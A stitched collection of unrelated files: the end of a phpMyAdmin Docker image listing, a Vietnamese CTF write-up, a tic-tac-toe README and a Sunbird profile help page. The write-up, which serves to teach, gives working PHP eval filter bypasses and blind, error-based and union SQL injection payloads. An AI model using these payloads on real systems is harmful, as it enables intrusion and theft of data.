RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 00:25:11 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 00:25:11 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 00:25:11 GMT
CMD ["php-fpm"]
# Wed, 31 Mar 2021 09:21:37 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 09:21:37 GMT
ENV MAX_EXECUTION_TIME=600
# Wed, 31 Mar 2021 09:21:37 GMT
ENV MEMORY_LIMIT=512M
# Wed, 31 Mar 2021 09:21:38 GMT
ENV UPLOAD_LIMIT=2048K
# Wed, 31 Mar 2021 09:21:40 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Wed, 31 Mar 2021 09:21:40 GMT
ENV VERSION=5.1.0
# Wed, 31 Mar 2021 09:21:41 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Wed, 31 Mar 2021 09:21:41 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Wed, 31 Mar 2021 09:21:42 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Wed, 31 Mar 2021 09:22:01 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 09:22:05 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Wed, 31 Mar 2021 09:22:05 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Wed, 31 Mar 2021 09:22:06 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Wed, 31 Mar 2021 09:22:06 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:9963ac8f97a3cf1f319e6c80042725f76dce93363a3d6b65e6808e1cd1bcfd7f`
Last Modified: Tue, 30 Mar 2021 21:46:19 GMT
Size: 25.8 MB (25753755 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:371213f07fea0a0f872bf0d091f7465c36fa7dda5dd5954941ab4416869b7059`
Last Modified: Wed, 31 Mar 2021 00:43:52 GMT
Size: 227.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:938cc915f5117d6a5b05f98b4d0e1f7f16367df8d2bdb348a42a011d67843718`
Last Modified: Wed, 31 Mar 2021 00:44:02 GMT
Size: 64.7 MB (64709509 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:02470c7dad2d8dd8f8186e20fe6e989a534273373e80b8c45eb2afc1cd562287`
Last Modified: Wed, 31 Mar 2021 00:43:52 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:16c154eb1630eabecb460fc8372090099af3a08d4d9205c0480b650bf20c56de`
Last Modified: Wed, 31 Mar 2021 00:48:03 GMT
Size: 10.7 MB (10654498 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f2295b91965b29324ea4a0f61aed9bb67b4490343bfeab0b2ba04acb59330f28`
Last Modified: Wed, 31 Mar 2021 00:48:00 GMT
Size: 489.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:cec7b35a44ecbf9bbd49f746c4be1f8172a8d0e65f1207e91300d90fd33b2f6d`
Last Modified: Wed, 31 Mar 2021 00:48:04 GMT
Size: 27.7 MB (27686441 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2726db42a024f0426abcd9519e41e7657a8f47f6036ff94019c15028b01da6b3`
Last Modified: Wed, 31 Mar 2021 00:48:00 GMT
Size: 2.3 KB (2264 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:39bcf9c94af738669aecd4be2d4127c2ca208ea2367266d375145f0804244fb2`
Last Modified: Wed, 31 Mar 2021 00:48:00 GMT
Size: 245.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:51002783a640b7f8a9656724e3cdf4b5a4d5e8dd7e93c42db28ac63729774044`
Last Modified: Wed, 31 Mar 2021 00:48:00 GMT
Size: 8.4 KB (8447 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d580b6969287d2694cbba6088857be171e302cc48fa36ce8a671ba26f65bb146`
Last Modified: Wed, 31 Mar 2021 09:22:57 GMT
Size: 2.8 MB (2802711 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c9498329cf495d75dff54165a027df6cc8f3203c75f174a2da14c07e7778ff2b`
Last Modified: Wed, 31 Mar 2021 09:22:56 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f111dd951b73f348db5b82c3e40501467ddbb6d25c76a41c58108242dcde0ac2`
Last Modified: Wed, 31 Mar 2021 09:23:02 GMT
Size: 14.1 MB (14064174 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:98069cb0c924fd3ebfc7aac20f968743869421537fca0f43c0a3eeaa9d6747b5`
Last Modified: Wed, 31 Mar 2021 09:22:56 GMT
Size: 1.5 KB (1527 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:5a761df3372bd96d17805b2264333a2899b709ea16e4c66642ebf33cd7fadffb`
Last Modified: Wed, 31 Mar 2021 09:22:56 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
| 92.121024 | 1,940 | 0.702562 | yue_Hant | 0.217221 |
977def217f8826e5bb95143b2032e3fd65c34440 | 13,605 | md | Markdown | _posts/2021-08-22-WRITEUP-WEB-VKL-CTF-2021.md | DauHoangTai/DauHoangTai.github.io | ff71442edda9bb29d4d57309ee568bde3d19296f | [
"MIT"
] | null | null | null | _posts/2021-08-22-WRITEUP-WEB-VKL-CTF-2021.md | DauHoangTai/DauHoangTai.github.io | ff71442edda9bb29d4d57309ee568bde3d19296f | [
"MIT"
] | null | null | null | _posts/2021-08-22-WRITEUP-WEB-VKL-CTF-2021.md | DauHoangTai/DauHoangTai.github.io | ff71442edda9bb29d4d57309ee568bde3d19296f | [
"MIT"
] | 3 | 2021-06-08T16:52:33.000Z | 2021-09-07T10:09:04.000Z | ---
layout: post
title: "WRITEUP WEB-VKL CTF 2021: WEB"
categories: CTF
toc: true
---
Ở bài này mình chỉ viết về 4 challenge của mình nha. (Eval ga VKL 1, Eval ga VKL 2, Baby SQL, FreeFlag).
Source tất cả các bài mình để ở đây [SOURCE](https://github.com/DauHoangTai/CTF/tree/master/2021/webvkl-CTF)
## Challenge Eval ga VKL 1 (5 solved)
Đầu tiên truy cập chall thì chúng ta được nhận 1 source code như sau.
```php
<?php
error_reporting(0);
chdir("/");
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (preg_match("/[3-9`~!@#\$%^&*\-=+,;?'\"\[\]\{\}\\\\]|0|pcntl|highlight_file|var|root|func|contents|eval|count|cmp/i",$cmd) || substr_count($cmd,'.') > 2 || strlen($cmd) > 64) {
die("ấu nâu !");
} else {
eval($cmd.";");
}
} else {
highlight_file(__FILE__);
}
?>
```
Đầu vào là `cmd` được filter khá kĩ, kiểm tra đầu vào nếu có 2 dấu chấm trở lên thì die và limit len là < 65. Nhưng chú ý thì không có system, exec hay các hàm có thể RCE.
Thử với `?cmd=system(id)` thì nhận được blank page => đời không như là mơ.
Đọc phpinfo() thì thấy các hàm có thể RCE đã bị disable.
Bây giờ quay lại xem có thể sài những kí tự hay hàm nào: `chr strlen log log1p 2 1 print_r readfile end current next` -> đây là một số hàm có thể sử dụng. Bạn có thể check kĩ hơn và viết code để so disable function với function có trong php thì sẽ ra những hàm nào không bị disable nhé.
### Payload
```
Check các file và folder có trong / -> print_r(scandir(chr(strlen(log1p(1).log1p(1).log1p(2)))))
Thấy flag ở cuối array trả về
đọc flag -> readfile(end(scandir(chr(strlen(log1p(1).log1p(1).log1p(2))))))
```
Để mọi người hiểu hơn thì mình debug ở đây nhé

Flag -> `web-vkl{dm_ch4ll_3z_vllllllll_!!!}`
## Challenge Eval ga VKL 2 (3 solved)
Bài này vẫn được cung cấp source như bài 1.
```php
<?php
error_reporting(0);
chdir("/");
if (isset($_GET['cmd'])) {
$cmd = $_GET['cmd'];
if (preg_match("/[3-9`~!@#\$%^&*\-=+.,;?'\"\[\]\{\}\\\\]|\([2]|\_[a-q]|0|1|pcntl|highlight_file|var|root|len|func|contents|eval|count|cmp/i",$cmd) || substr_count($cmd,'ext') > 1 || substr_count($cmd,'scan') > 1) {
die("ấu nâu !");
} else {
eval($cmd.";");
}
} else {
highlight_file(__FILE__);
}
?>
```
Đọc thì thấy payload ở ver 1 sẽ không sài được nữa vì đã filter `len 1 `, nếu như sau ( là 2 và sau _ là a-q cũng bị ban. `ext` và `scan` chỉ được xuất hiện 1 lần. Mục đích ở đây là chặn `next` và `scandir` xuất hiện trong input quá 1 lần.
Ở disable function có mở thêm là `array_reverse` nếu ai có check lại sẽ thấy. Nhưng trong các filter thì vẫn sót là `getallheaders()` => sử dụng nó thôi :))
### Payload

Thêm header `cc: /` và get lên `?cmd=print_r(next(getallheaders()))`. Tới đây thì đã tạo được `/` rồi thì dùng scandir để xem file và folder thôi.
`print_r(scandir(next(getallheaders())))` -> flag nằm ở phần từ thứ 2 ở cuối mảng và có tên `vaday_la_flag_hahah_hihihi_hoho.txt`.
Cuối cùng là đọc flag.

Flag -> `web-vkl{Wow_w0w_writ3_p4yl0ad_1n_5s_3625146215!}`
## Challenge Baby SQL (0 solved)
Đầu tiên thử register và login account đó. Khi đăng nhâp vào thì thấy được account có 20 star và status được set là 1. Để vào được `/flag` thì star phải >= 100.
Ở đây mình chỉ cần lập 1 account khác và chuyển số `-100` thì account của mình đã có 120 star. (Lúc đầu mình tính check số âm và để mọi người race nhưng giảm bớt thì mình làm cách này cho lẹ :3 )
Vô được flag.php thì nhận được 1 source code như sau
```php
<?php
session_start();
include_once("config.php");
$stmt = $conn->prepare('select * from users where username=?');
if (!$stmt)
throw new Exception("prepare query error:" . $conn->error);
$stmt->bind_param('s', $_SESSION['username']);
$stmt->execute();
$result = $stmt->get_result();
while ($row = $result->fetch_assoc()) {
$checkStar = $row['star'];
}
if ($checkStar >= 100) {
if (isset($_GET['pass'])) {
$pass = $_GET['pass'];
if (preg_match("/user|insert|ord|chr|version|len|mid|like|right|substr|exp|cur|ascii|=|and|or|0x|between|rand|convert|sleep|xml|extract|concat|info|sys|[0-9~\/\"<>!^;\\\]/i",$pass)) {
die("no hack");
} else {
// $query = "SELECT flag_ne_hihi FROM flag_here;";
$query = "SELECT pass FROM users1 where user = 'guest' and pass = '{$pass}';";
$result = @mysqli_fetch_array(mysqli_query($conn,$query));
if($result['pass']) {
// echo "wtf ?";
}
}
} else {
highlight_file(__FILE__);
}
} else {
die ("<script>alert('Not enough stars :( min 100 stars')</script>");
}
?>
```
Đầu tiên thì `pass` là input mình sẽ được đưa thẳng vào câu query sql. dấu `'` cũng không được filter => có thể sql injection.
Sau khi thực hiện câu query thì nếu có data `pass` trả về thì sẽ không in gì cả => tới đây thì cúng đủ nhận thấy là time-base sqli.
Chủ yếu là đoạn filter ở `preg_match`. Ở đây mình đã filter hầu như gần hết các hàm có thể blind sqli, cụ thể hơn là hàm `sleep` có thể sử dụng để exploit time-base sqli. Tiếp theo đó là mình đã filter number [0-9].
Trong mysql mình cũng có thể sử dụng `benchmark` giống như `sleep` để làm delay server responses, nhưng vói điều kiện các tham số trong đó phải đủ lớn. Nếu bạn chưa hiểu có thể tìm hiểu về nó trên google để có thể hiểu rõ hơn.
`left` cũng chưa được filter nên có thể sử dụng để thay `substr`.
`in` để thay cho `= like > <`.
Điều khó là tạo số thì mình sử dụng `INSTR()`, giải thích về hàm này sơ qua đó là nó sẽ trả về vị trí của chuỗi con mình đưa vào. VD: INSTR("a","a") sẽ là 1, INSTR("ba","a") sẽ là 2 => có thể tạo số.
Giờ là đến việc tạo số đủ lớn cho `benchmark()` để có thể làm delay server responses. Ở đây mình sử dụng `pow()` với `pi()` để tạo ra số đủ lớn => ez time-base.
### Payload
```
' || left((select flag_ne_hihi from flag_here),(INSTR('a','a')))in('w')%26%26benchmark((pow(pi()%2bpi(),pi()*pi())),(INSTR('a','a')))%23
```
Khi chạy payload trên mọi người sẽ thấy server sẽ bị delay.
Mình để trong `IN` là chữ `w` vì nó là chữ cái đầu của flag và bị delay, nếu mọi người để char khác thì nó sẽ không delay lâu như vậy. Tới đây mọi người có thể viết code và brute nhé.
Flag -> `web-vkl{Wow_You_Are_Hacker_Sju_Cap}`
## Challenge FreeFlag (1 solved)
Sau khi register và login thì nhận được 1 source như sau
```php
<?php
session_start();
include_once("config.php");
if (isset($_SESSION['username'])) {
if (isset($_GET['id'])) {
$id = $_GET['id'];
if (preg_match("/insert|substr|mid|left|right|ord|pi|chr|sys|0x|version|concat|ascii|convert|and|or|procedure|xml|extract|by|create|like|sleep|if|case|db|load|to|count|where|column|rand|in|[1-9`~.^\-\/\\\=<>|$]/i",$id)) {
die("nope !");
} else {
$query1 = "SELECT * FROM numbers where id = {$id};";
$result = $conn->query($query1);
while ($row = $result->fetch_assoc()) { //db 2 column
$number = $row['number'];
// echo $number;
if ((int)$number === 2050 || (int)$number === 2051) {
$_SESSION["admin"] = true;
header("Location: flag.php");
}
else {
die("Try harder :) ");
}
}
}
} else {
highlight_file(__FILE__);
}
} else {
header("Location: login.php");
}
?>
```
Chúng ta có đầu vào là `id` và được filter rất nhiều hàm trong mysql, check luôn số từ 1-9 và 1 số kí tự. `id` được đưa thẳng vào câu query nên chúng ta có thể sql injection ở đây. Để có thể redirect tới được `flag.php` thì câu query `$query1 = "SELECT * FROM numbers where id = {$id};";` phải có cột number trả về là 2050 hoặc 2051. Khi đó `$_SESSION["admin"]` sẽ set bằng true, mặc định của mỗi account khi mới reg mình set là false.
Lí do mình để 2050 hoặc 2051 là ctf mình diễn ra 2 ngày đó là 21-08-2021 và 22-08-2021, cộng ngày tháng năm lại thì sẽ được 2050 và 2051. Vì vậy mình sài payload sau để có thể redirect tới `flag.php`.
```
?id=0 union select 0,(select((select (day(curdate()))) %2b (select(month(curdate()))) %2b (select(year(curdate())))));
```
Khi vô được `flag.php` thì mở mã nguồn lên thấy được `?source` => access và có source.
```php
<?php
include_once("config.php");
if (isset($_SESSION["admin"]) && $_SESSION["admin"] === true) {
if (isset($_GET['id'])) {
$id = $_GET['id'];
if (preg_match("/insert|substr|mid|left|right|ord|chr|sys|pi|rand|0x|version|concat|ascii|convert|and|or|procedure|xml|extract|by|create|like|sleep|if|case|db|load|to|count|where|column|in|[1-9`~.^\-\/\\\=<>|$*]/i",$id) || substr_count($id,'0') > 1) {
die("no hack");
} else {
$query = "SELECT id,flag_name,flag_fake FROM flag WHERE id={$id};";
$result = $conn->query($query);
while ($row = $result->fetch_assoc()) {
echo "<tr><th>".$row['id']."</th><th>".$row['flag_name']."</th><th>".$row['flag_fake'];
}
}
}
if(isset($_GET['ai_di'])) {
$ai_di = $_GET['ai_di'];
if (preg_match("/insert|substr|mid|left|right|ord|chr|sys|pi|rand|0x|version|concat|ascii|convert|and|or|procedure|xml|extract|by|create|like|sleep|if|case|db|load|to|count|where|column|in|[2-9`~.^\-\/\\\=<>|$]/i",$ai_di) || substr_count($ai_di,'1') > 1 || substr_count($ai_di,'0') > 2) {
die("hack ghe vay bro ?");
} else {
$query = "SELECT id,flag_name,flag_fake FROM flag WHERE id={$ai_di};";
$result = mysqli_query($conn,$query);
if (!$result) {
echo mysqli_error($conn);
} else {
echo "nice!";
}
}
}
} else {
die("no admin");
}
if (isset($_GET['source'])) {
readfile("flag.php");
}
?>
```
Đầu tiên thì thấy được trong source này có 3 tham số nhận đầu vào là `id, ai_di, source`. Ở source thì chỉ có chức năng là đọc file. (cho source). Ở `id` thì qua preg_match để filter một số function trong mysql và 1-9 và 1 vài kí tự. 0 không được xuất hiện nhiều hơn 1 lần trong input của mình.
Ở đây sót lại mốt số thứ có thể sài được như là `union select from 0 ()` và một số thứ khác, mọi người có thể tìm thêm :)).
`$query = "SELECT id,flag_name,flag_fake FROM flag WHERE id={$id};";` id mình truyên vào được đưa vào query này và sau đó lấy ra các giá trị `id, flag_name, flag_fake` và show ra màn hình.
Ở `id` filter còn sót 0 nên mình có thể thử nhập id=0

Nhìn vào như vậy thì cũng có thể thấy được flag real không nằm trong 3 cột này mà cần phải tìm cột khác chưa flag real.
Tiếp tục đến với `ai_di` thì chúng được filter các fucntion trong mysql như `id`. Các kí tự cũng như thế nhưng chỉ khác number chỉ filter từ 2-9, 1 không được xuất hiện quá 1 lần và 0 không xuất hiện quá 2 lần trong input.
```php
$query = "SELECT id,flag_name,flag_fake FROM flag WHERE id={$ai_di};";
$result = mysqli_query($conn,$query);
if (!$result) {
echo mysqli_error($conn);
} else {
echo "nice!";
}
```
`ai_di` sẽ được đưa vô và execute câu query trên. Nếu có lỗi thì sẽ dump ra lỗi của query đó `echo mysqli_error($conn);`. Execute thánh công sẽ thì sẽ in ra `nice`.
Nhìn vào code trên thì chắc ai cũng đoán được là dựa vô đây để dump ra các cột còn lại có trong `flag` (Error-Based SQL Injection) và từ đó sử dụng `?id` ban đầu để đọc data column đó.
Ở preg_match filter còn sót một số hàm toán như `exp power`, khi truyền vào một số đủ lớn thì 2 hàm đó sẽ trả về kết quả vượt quá range của INT và dump ra lỗi, mình sẽ chain với câu query của mình => dump được tên cột. Mọi người có thể lên google tìm hiểu về 2 hàm này và cách sử dụng nó để dump ra column có trong table.
Link bài viết mình để ở đây
[Error Based SQL Injection Using EXP](https://osandamalith.com/2015/07/15/error-based-sql-injection-using-exp/). Nhưng trong bài viết này người ta sử dụng `~` hoặc truyển number vào nhưng những thứ đó thì mình đã filter. Chỉ có sót lại là số 0 mà 0 thì bạn nhập bao nhiêu 0 vào cũng không thể vượt quá range của INT được.
Tới đây nếu ai vượt qua được step 1 để vô được `flag.php` thì dễ rồi hehe. Ở step đó là cách tạo số và giờ sử dụng lại nó thôi.
### Payload
Mình sẽ để full payload từ step 1 luôn nhé.
```
Payload lên admin -> ?id=0 union select 0,(select((select (day(curdate()))) %2b (select(month(curdate()))) %2b (select(year(curdate())))))
Payload dump column -> ?ai_di=0 *(select (exp((SELECT year(curdate())) %2b (select 0 from (SELECT * from flag limit 1) as a))))
Payload đọc flag -> ?id = 0 union select null,null,(select flag_real_siu_cap from flag)
```
Ở bài này có 1 solved và sử dụng hex, mọi người có thể tìm hiểu về hex và sử dụng nó cũng được nhé. Mình đã quên hàm đó :3
## Lời kết
Cảm ơn tất cả mọi người đã tham gia WEB-VKL CTF 2021, mong đây là 1 dịp cho mọi người luyện lại các kĩ năng mà bản thân đã học được cũng như giúp được một số bạn học được kiến thức mới. Nếu có một số sai sót gì về challenge thì mong các bạn bỏ qua ♥
THANK YOU !
| 50.764925 | 436 | 0.639544 | vie_Latn | 0.999997 |
977dfa47ac3657a78c65dde19882c2765174d937 | 2,332 | md | Markdown | README.md | ferbaco86/js-tic-tac-toe | 5b7a5788f4ae82c9099595fb7e805998a4530c89 | [
"MIT"
] | 12 | 2020-09-09T00:00:56.000Z | 2021-04-12T23:29:16.000Z | README.md | kbjude/js-tic-tac-toe | 5b7a5788f4ae82c9099595fb7e805998a4530c89 | [
"MIT"
] | 1 | 2020-09-07T14:23:42.000Z | 2020-09-13T20:07:09.000Z | README.md | kbjude/js-tic-tac-toe | 5b7a5788f4ae82c9099595fb7e805998a4530c89 | [
"MIT"
] | 1 | 2021-06-28T17:38:29.000Z | 2021-06-28T17:38:29.000Z | # js-tic-tac-toe
A collaborative project of a tic-tac-toe game aimed at allowing two users to play against each other. The game is capable of ending in 3 states: with a winner, loser, and a draw. Each user after entering their names are given a symbol that identifies them on the board.
## Requirements
- Ensure that you have node modules installed on your computer
- Have a browser that supports HTML 5
## Features
Some of the features of this project include but not limited to:
- Simple animated intro
- 8-bit retro feel for the game UI
- Inputs for registering players names
- For this implementation, player one will have the symbol "X" and player two the symbol "O"
## Instructions
- Make your first move by clicking on the board where you want to position your symbol
- Wait for the other player to do the same
- The first player to create a three-in-a-row sequence of their symbol wins
- The sequence can either be vertical, horizontal, or diagonal
- If all squares are occupied by a symbol and there is no winning combination then the game is considered a tie
## Screenshots


## Using the System
- Clone the project off GitHub to your local computer
- Be sure to add the live server extension of VScode if you are using that
- The live server will run the code for you in your default browser
## Live Version
https://tic-tac-toe-javascript.netlify.app/
## Technologies Used
- Vanilla JS
- HTML
- CSS
- NES.css
## Potential Features
- Add chip-tunes for background music
- Animate UI transitions
## Contributors
👤 **Jude Kajura**
- GitHub: [@kbjude](https://github.com/kbjude)
- Twitter:[@balindakj](https://twitter.com/balindakj)
- LinkedIn: [kajura-jude](https://www.linkedin.com/feed/)
👤 **Fernando Bahamondes**
- Github: [@ferbaco86](https://github.com/ferbaco86)
- Twitter: [@ferbac0](https://twitter.com/ferbac0)
- LinkedIn: [fernando-bahamondes](https://www.linkedin.com/in/fernando-bahamondes-correa)
## Acknowledgments
- 512 Sound Effects (8-bit style) by [SubspaceAudio](https://opengameart.org/content/512-sound-effects-8-bit-style) | 35.876923 | 269 | 0.754717 | eng_Latn | 0.978026 |
977e9dbccb6f27b42a3bd3cfdd332a8f1b94a55c | 6,866 | md | Markdown | pages/features-documentation/userprofile.md | lakhanmandloi/project-sunbird.github.io | 27fb2df4d87f4508a987e471d661ff35d74e83f5 | [
"MIT"
] | 7 | 2017-11-07T00:40:47.000Z | 2021-06-26T09:45:37.000Z | pages/features-documentation/userprofile.md | lakhanmandloi/project-sunbird.github.io | 27fb2df4d87f4508a987e471d661ff35d74e83f5 | [
"MIT"
] | 558 | 2017-09-28T11:52:53.000Z | 2018-12-21T09:48:54.000Z | pages/features-documentation/userprofile.md | lakhanmandloi/project-sunbird.github.io | 27fb2df4d87f4508a987e471d661ff35d74e83f5 | [
"MIT"
] | 87 | 2017-09-27T10:02:44.000Z | 2018-11-12T06:16:40.000Z | ---
type: landing
directory: features-documentation
title: User Profile
page_title: User Profile
description: User Profile
keywords: 'Profile, create profile, log in, sign in '
published: true
allowSearch: true
---
## Overview
Creating and updating profile on Sunbird platform is a seamless process. This allow users to extend and provide informations related to their experience, skills, education, awards etc. Providing this information helps the system provide personalized recommendations for courses to upgrade your skills, selects you for custom programs, connects you to others in the community, build bridges for collaboration, etc. You may choose to create, update or edit your profile information at any time.
<b>Note</b>: Enter details in all mandatory fields. You cannot submit the form in case you miss entering details in any of the mandatory fields. In such a case, an error message is displayed. Close the message box and provide the required details, before you proceed to submit the form.
### Prerequisites
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. You are logged in <br>2. You are currently on <b>Home</b> page <br>3. You want to add or edit your personal information , you have clicked on <b>Profile</b> tab
</td>
<td><img src="pages/features-documentation/images/profile/prerequisite.png"></td>
</tr>
</table>
### Viewing Profile and Adding Image
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. Login with the registered credential <br>2. Click <b>Profile</b> tab on the header<br>Or <br>3. Click <b>Profile</b> to the right</td>
<td><img src="pages/features-documentation/images/profileimg1.png"></td>
</tr>
<tr>
<td>1. Depending on your organization, you can see few information are already available, viz: <b>Username</b>, <b> City</b> you belong to etc <br>2. Click the <b>Edit</b> icon on your profile, to add profile image. For details on adding image to profile, refer <a href="features-documentation/metadata_addingimages" target="_blank">Adding Images</a> <br>3. You can also see your <b>Last Login Time</b> <br><br><b>Note:</b> Maximum image upload size is 4 MB</td>
<td><img src="pages/features-documentation/images/profileimg2.png"></td>
</tr>
</table>
### Selecting Organization Types
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. Click <b>Search</b> dropdown button <br>2. Select <b>Organizations</b> from the dropdown list <br>3. Click <b>Filter</b> icon <br>4. Select <b>Organization Type</b> from the dropdown list <br>5. Click <b>Apply</b> to associate an organization with the organization type <br>6. Click <b>Reset</b> button to select attributes again</td>
<td><img src="pages/features-documentation/images/setuporgtype.png"></td>
</tr>
</table>
### Filtering Profile by Attributes
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. Click <b>Search</b> dropdown button <br>2. Select <b>Users</b> from the dropdown list <br>3. Click <b>Filter</b> icon <br>4. You can filter the profile by: <li><b>Grades</b></li>
<li><b>Medium</b></li>
<li><b>Subjects</b></li>
<li><b>Roles</b></li>
<li><b>Location</b></li>
<br>5. Click <b>Apply</b> to tag an organization with the organization type <br>6. Click <b>Reset</b> to select attributes again</td>
<td><img src="pages/features-documentation/images/profileattribute.png"></td>
</tr>
</table>
### Viewing Profile Completeness Status
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>1. You can see your <b>Profile Completeness</b> status, indicated by profile completeness bar and percentage <br>2. Click on <b>Plus</b> icon to add details viz, <b>Profile Description, Language known, Profile picture</b></td>
<td><img src="pages/features-documentation/images/profilestatus.png"></td>
</tr>
<tr>
